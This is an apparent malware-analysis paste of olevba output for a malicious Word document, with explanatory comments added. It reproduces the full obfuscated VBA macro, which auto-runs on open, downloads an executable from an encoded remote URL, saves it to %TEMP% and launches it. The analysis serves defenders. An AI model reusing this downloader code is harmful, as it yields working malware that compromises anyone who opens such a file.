dynamoo

Malicious Word macro

Mar 12th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 3020jqm.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 3020jqm.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'Auto-executing entry point: Word runs a Sub named AutoOpen when the
'document is opened (see the AutoExec row in the ANALYSIS table), so the
'single call below fires as soon as macros are enabled, with no further
'user action. All real work is in eHk, defined in the next module.
Sub autoopen()
eHk
End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO авпавп.bas
  27. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/\u0430\u0432\u043f\u0430\u0432\u043f'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
'Downloader body, called from autoopen(). Every string it uses is first
'assembled from Chr$() calls and then Base64-decoded by ggSFhCPeLdOSshe
'(the decoder in the module listed after this one); the decoded values
'quoted in the comments below were recovered from the Base64 text on the
'corresponding line. The nested For loops contain nothing but DoEvents:
'they do not influence the result and look like padding that delays
'execution (inference, not established by the code itself). The non-ASCII
'loop-variable names are kept exactly as olevba extracted them.
Sub eHk()
'Decodes to "MSXML2.ServerXMLHTTP": the HTTP client used for the download.
Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
'Decodes to "Adodb.Stream": used below to write the response body to disk.
Set w2 = CreateObject(ggSFhCPeLdOSshe(Chr$(81) & Chr$(87) & Chr$(82) & Chr$(118) & Chr$(90) & Chr$(71) & Chr$(73) & Chr$(117) & Chr$(85) & Chr$(51) & Chr$(82) & Chr$(121) & Chr$(90) & Chr$(87) & Chr$(70) & Chr$(116)))
'First argument decodes to "GET"; the second is the remote URL of the
'payload (decoded value deliberately not reproduced here); the trailing
'False makes the request synchronous, so Send blocks until it completes.
D8Hif8ju.Open ggSFhCPeLdOSshe(Chr$(82) & Chr$(48) & Chr$(86) & Chr$(85)), ggSFhCPeLdOSshe(Chr$(97) & Chr$(72) & Chr$(82) & Chr$(48) & Chr$(99) & Chr$(72) & Chr$(77) & Chr$(54) & Chr$(76) & Chr$(121) & Chr$(56) & Chr$(53) & Chr$(77) & Chr$(105) & Chr$(52) & Chr$(50) & Chr$(77) & Chr$(121) & Chr$(52) & Chr$(52) & Chr$(79) & Chr$(67) & Chr$(52) & Chr$(120) & Chr$(77) & Chr$(68) & Chr$(73) & Chr$(118) & Chr$(89) & Chr$(88) & Chr$(66) & Chr$(112) & Chr$(76) & Chr$(50) & Chr$(100) & Chr$(105) & Chr$(77) & Chr$(83) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), False
'Option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS and 13056
'(&H3300) is SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS: an invalid or
'untrusted TLS certificate on the server will not stop the download.
D8Hif8ju.SetOption 2, 13056
D8Hif8ju.Send
'Padding loops: DoEvents only, no other effect on state.
Dim ÁQÇëÑÍïó As Integer
For ÁQÇëÑÍïó = 0 To 7
Dim ñáÑëÁwÇô As Integer
For ñáÑëÁwÇô = 0 To 7
Dim ËqToôÂÔè As Integer
For ËqToôÂÔè = 0 To 1
DoEvents
Next ËqToôÂÔè
DoEvents
Next ñáÑëÁwÇô
Dim éáÃWèÏâê As Integer
For éáÃWèÏâê = 0 To 5
DoEvents
Next éáÃWèÏâê
DoEvents
Next ÁQÇëÑÍïó
Dim ÄÿøÊèÌ As Integer
For ÄÿøÊèÌ = 0 To 3
Dim áûÐÈÝÂè As Integer
For áûÐÈÝÂè = 0 To 6
DoEvents
Next áûÐÈÝÂè
DoEvents
Next ÄÿøÊèÌ
Dim ÖìÔÌíÃÈé As Integer
For ÖìÔÌíÃÈé = 0 To 1
DoEvents
Next ÖìÔÌíÃÈé
'w2 is the Adodb.Stream created above; the members set inside this With
'block are interleaved with more DoEvents padding loops.
With w2
Dim qéÊîôÄòÁ As Integer
For qéÊîôÄòÁ = 0 To 4
Dim ÕÖÈÏQóQW As Integer
For ÕÖÈÏQóQW = 0 To 9
Dim ÂôìõëÔÕÌ As Integer
For ÂôìõëÔÕÌ = 0 To 5
DoEvents
Next ÂôìõëÔÕÌ
DoEvents
Next ÕÖÈÏQóQW
Dim ÕÇûáËèïË As Integer
For ÕÇûáËèïË = 0 To 4
DoEvents
Next ÕÇûáËèïË
DoEvents
Next qéÊîôÄòÁ
Dim ëÐWëêäìÔ As Integer
For ëÐWëêäìÔ = 0 To 5
Dim êòóÅïwÏì As Integer
For êòóÅïwÏì = 0 To 8
DoEvents
Next êòóÅïwÏì
DoEvents
Next ëÐWëêäìÔ
Dim îóõéÊÈñÁ As Integer
For îóõéÊÈñÁ = 0 To 9
DoEvents
Next îóõéÊÈñÁ
'1 = adTypeBinary: the stream holds raw bytes, not text.
.Type = 1
Dim íÇÉqåwÕÑ As Integer
For íÇÉqåwÕÑ = 0 To 3
Dim îÑÔWéÅÒÛ As Integer
For îÑÔWéÅÒÛ = 0 To 9
Dim èîôÍõóãá As Integer
For èîôÍõóãá = 0 To 3
DoEvents
Next èîôÍõóãá
DoEvents
Next îÑÔWéÅÒÛ
Dim êÂÉöÈÔëð As Integer
For êÂÉöÈÔëð = 0 To 3
DoEvents
Next êÂÉöÈÔëð
DoEvents
Next íÇÉqåwÕÑ
Dim ðõqqÈÃîñ As Integer
For ðõqqÈÃîñ = 0 To 6
Dim ñÓÃÒàïÇé As Integer
For ñÓÃÒàïÇé = 0 To 4
DoEvents
Next ñÓÃÒàïÇé
DoEvents
Next ðõqqÈÃîñ
Dim ûéQÊôíâà As Integer
For ûéQÊôíâà = 0 To 3
DoEvents
Next ûéQÊôíâà
.Open
Dim ïwëàãÖÏÛ As Integer
For ïwëàãÖÏÛ = 0 To 4
Dim ïÐõôõÊÍÔ As Integer
For ïÐõôõÊÍÔ = 0 To 4
Dim áèöçëàêè As Integer
For áèöçëàêè = 0 To 3
DoEvents
Next áèöçëàêè
DoEvents
Next ïÐõôõÊÍÔ
Dim ÀÕàÄèçõõ As Integer
For ÀÕàÄèçõõ = 0 To 3
DoEvents
Next ÀÕàÄèçõõ
DoEvents
Next ïwëàãÖÏÛ
Dim àÛÑàòòÀë As Integer
For àÛÑàòòÀë = 0 To 2
Dim ÕéwÑÒõÊê As Integer
For ÕéwÑÒõÊê = 0 To 4
DoEvents
Next ÕéwÑÒõÊê
DoEvents
Next àÛÑàòòÀë
Dim ÕéëÌàÎÎò As Integer
For ÕéëÌàÎÎò = 0 To 4
DoEvents
Next ÕéëÌàÎÎò
'Copy the downloaded bytes from the HTTP response into the stream.
.Write D8Hif8ju.ResponseBody
Dim ÌõWÌôïâW As Integer
For ÌõWÌôïâW = 0 To 4
Dim åëÖïûéÊô As Integer
For åëÖïûéÊô = 0 To 6
Dim ÎîÀëÃÏÐÓ As Integer
For ÎîÀëÃÏÐÓ = 0 To 8
DoEvents
Next ÎîÀëÃÏÐÓ
DoEvents
Next åëÖïûéÊô
Dim ÕÏîÄÎÄñq As Integer
For ÕÏîÄÎÄñq = 0 To 1
DoEvents
Next ÕÏîÄÎÄñq
DoEvents
Next ÌõWÌôïâW
Dim òñ÷ËÔâí As Integer
For òñ÷ËÔâí = 0 To 8
Dim óõÅÖòÄÛÕ As Integer
For óõÅÖòÄÛÕ = 0 To 3
DoEvents
Next óõÅÖòÄÛÕ
DoEvents
Next òñ÷ËÔâí
Dim ÓäëÈÇÇÑû As Integer
For ÓäëÈÇÇÑû = 0 To 5
DoEvents
Next ÓäëÈÇÇÑû
'Path decodes to Environ("TEMP") & "\dsfsdfsdf.exe"; 2 = adSaveCreateOverWrite,
'so an existing file of that name is replaced. This write under %TEMP% is
'the on-disk artefact to look for.
.SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2
Dim ÌõWÂÂõëã As Integer
For ÌõWÂÂõëã = 0 To 7
Dim ÅëìíôÐàÖ As Integer
For ÅëìíôÐàÖ = 0 To 7
Dim ûÀÅÖàñöÒ As Integer
For ûÀÅÖàñöÒ = 0 To 6
DoEvents
Next ûÀÅÖàñöÒ
DoEvents
Next ÅëìíôÐàÖ
Dim âëôäåñàñ As Integer
For âëôäåñàñ = 0 To 9
DoEvents
Next âëôäåñàñ
DoEvents
Next ÌõWÂÂõëã
Dim ëáõÌÔðöÍ As Integer
For ëáõÌÔðöÍ = 0 To 5
Dim öûÂõwÀÂÑ As Integer
For öûÂõwÀÂÑ = 0 To 3
DoEvents
Next öûÂõwÀÂÑ
DoEvents
Next ëáõÌÔðöÍ
Dim ÖïûÃàÀÎÀ As Integer
For ÖïûÃàÀÎÀ = 0 To 7
DoEvents
Next ÖïûÃàÀÎÀ
End With
'Decodes to "Shell.Application".
Set pP5hKP = CreateObject(ggSFhCPeLdOSshe(Chr$(85) & Chr$(50) & Chr$(104) & Chr$(108) & Chr$(98) & Chr$(71) & Chr$(119) & Chr$(117) & Chr$(81) & Chr$(88) & Chr$(66) & Chr$(119) & Chr$(98) & Chr$(71) & Chr$(108) & Chr$(106) & Chr$(89) & Chr$(88) & Chr$(82) & Chr$(112) & Chr$(98) & Chr$(50) & Chr$(52) & Chr$(61)))
'Shell.Application.Open on the same %TEMP% path saved above: this is the
'step that launches the downloaded file (process creation from %TEMP% by
'WINWORD is the behaviour to alert on).
pP5hKP.Open Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61))
End Sub
  213.  
  214.  
  215. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  216. ANALYSIS:
  217. +------------+--------------+-----------------------------------------+
  218. | Type       | Keyword      | Description                             |
  219. +------------+--------------+-----------------------------------------+
  220. | Suspicious | CreateObject | May create an OLE object                |
  221. | Suspicious | SaveToFile   | May create a text file                  |
  222. | Suspicious | Open         | May open a file                         |
  223. | Suspicious | Environ      | May read system environment variables   |
  224. | Suspicious | Write        | May write to a file (if combined with   |
  225. |            |              | Open)                                   |
  226. | Suspicious | Chr          | May attempt to obfuscate specific       |
  227. |            |              | strings                                 |
  228. +------------+--------------+-----------------------------------------+
  229. -------------------------------------------------------------------------------
  230. VBA MACRO оокеаыв.bas
  231. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/\u043e\u043e\u043a\u0435\u0430\u044b\u0432'
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'Bit masks and powers of two used by the Base64 decoder below. Each group
'of four Base64 characters is rebuilt into a 24-bit value ("quad"), then
'split back into three bytes.
Private Const clOneMask = 16515072      '&HFC0000: sextet 1 (bits 18-23); not referenced by the decoder
Private Const clTwoMask = 258048        '&H03F000: sextet 2 (bits 12-17); not referenced by the decoder
Private Const clThreeMask = 4032        '&H000FC0: sextet 3 (bits 6-11);  not referenced by the decoder
Private Const clFourMask = 63           '&H00003F: sextet 4 (bits 0-5);   not referenced by the decoder
Private Const clHighMask = 16711680     '&HFF0000: first output byte of the quad
Private Const clMidMask = 65280         '&H00FF00: second output byte
Private Const clLowMask = 255           '&H0000FF: third output byte
Private Const cl2Exp18 = 262144         '2^18: weight of the first sextet
Private Const cl2Exp12 = 4096           '2^12: weight of the second sextet
Private Const cl2Exp6 = 64              '2^6:  weight of the third sextet
Private Const cl2Exp8 = 256             '2^8:  divisor that shifts the middle byte down
Private Const cl2Exp16 = 65536          '2^16: divisor that shifts the high byte down
  245.  
  246. Public Function ggSFhCPeLdOSshe(sString As String) As String
  247.     Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
  248.     Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
  249.     Dim lTemp As Long
  250.     sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
  251.    sString = Replace(sString, vbLf, vbNullString)      'either order.
  252.    lTemp = Len(sString) Mod 4                          'Test for valid input.
  253.    If lTemp Then
  254.         Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
  255.     End If
  256.     If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
  257.        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
  258.    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
  259.        iPad = 1
  260.     End If
  261.     For lTemp = 0 To 255                                'Fill the translation table.
  262.        Select Case lTemp
  263.             Case 65 To 90
  264.                 bTrans(lTemp) = lTemp - 65              'A - Z
  265.            Case 97 To 122
  266.                 bTrans(lTemp) = lTemp - 71              'a - z
  267.            Case 48 To 57
  268.                 bTrans(lTemp) = lTemp + 4               '1 - 0
  269.            Case 43
  270.                 bTrans(lTemp) = 62                      'Chr(43) = "+"
  271.            Case 47
  272.                 bTrans(lTemp) = 63                      'Chr(47) = "/"
  273.        End Select
  274.     Next lTemp
  275.     For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
  276.        lPowers6(lTemp) = lTemp * cl2Exp6
  277.         lPowers12(lTemp) = lTemp * cl2Exp12
  278.         lPowers18(lTemp) = lTemp * cl2Exp18
  279.     Next lTemp
  280.     bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
  281.    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.
  282.    For lChar = 0 To UBound(bIn) Step 4
  283.         lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  284.                 lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
  285.        lTemp = lQuad And clHighMask                    'Mask for the first byte
  286.        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
  287.        lTemp = lQuad And clMidMask                     'Mask for the second byte
  288.        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
  289.        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
  290.        lPos = lPos + 3
  291.     Next lChar
  292.     sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
  293.    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
  294.    ggSFhCPeLdOSshe = sOut
  295. End Function
  296. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  297. ANALYSIS:
  298. +------------+----------------+-----------------------------------------+
  299. | Type       | Keyword        | Description                             |
  300. +------------+----------------+-----------------------------------------+
  301. | Suspicious | Output         | May write to a file (if combined with   |
  302. |            |                | Open)                                   |
  303. | Suspicious | Chr            | May attempt to obfuscate specific       |
  304. |            |                | strings                                 |
  305. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  306. |            |                | be used to obfuscate strings (option    |
  307. |            |                | --decode to see all)                    |
  308. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  309. |            |                | may be used to obfuscate strings        |
  310. |            |                | (option --decode to see all)            |
  311. +------------+----------------+-----------------------------------------+